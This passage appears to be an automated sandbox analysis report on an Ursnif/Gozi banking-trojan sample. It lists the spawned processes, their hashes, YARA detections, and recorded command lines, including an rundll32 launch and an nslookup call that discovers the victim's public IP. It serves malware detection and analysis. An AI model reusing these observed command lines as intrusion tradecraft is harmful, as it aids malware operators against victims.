                                                                                                                                    MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000021.00000003.555186331.000001F85CC30000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                                                                    General

                                                                                                                                    Start time:19:11:10
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:
                                                                                                                                    Imagebase:0x7ff7ebed0000
                                                                                                                                    File size:99272 bytes
                                                                                                                                    MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                                                                    General

                                                                                                                                    Start time:19:11:11
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
                                                                                                                                    Imagebase:0x7ff6eb290000
                                                                                                                                    File size:69632 bytes
                                                                                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmp, Author: CCN-CERT
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000024.00000003.568075990.00000206755E0000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                                                                    General

                                                                                                                                    Start time:19:11:14
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\RuntimeBroker.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:
                                                                                                                                    Imagebase:0x7ff7ebed0000
                                                                                                                                    File size:99272 bytes
                                                                                                                                    MD5 hash:C7E36B4A5D9E6AC600DD7A0E0D52DAC5
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                    • Rule: GoziRule, Description: Win32.Gozi, Source: 00000025.00000002.714125714.000002191303E000.00000004.00000001.sdmp, Author: CCN-CERT

                                                                                                                                    General

                                                                                                                                    Start time:19:11:19
                                                                                                                                    Start date:22/01/2021
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\76B1.bi1'
                                                                                                                                    Imagebase:0x7ff7180e0000
                                                                                                                                    File size:273920 bytes
                                                                                                                                    MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                    Reset < >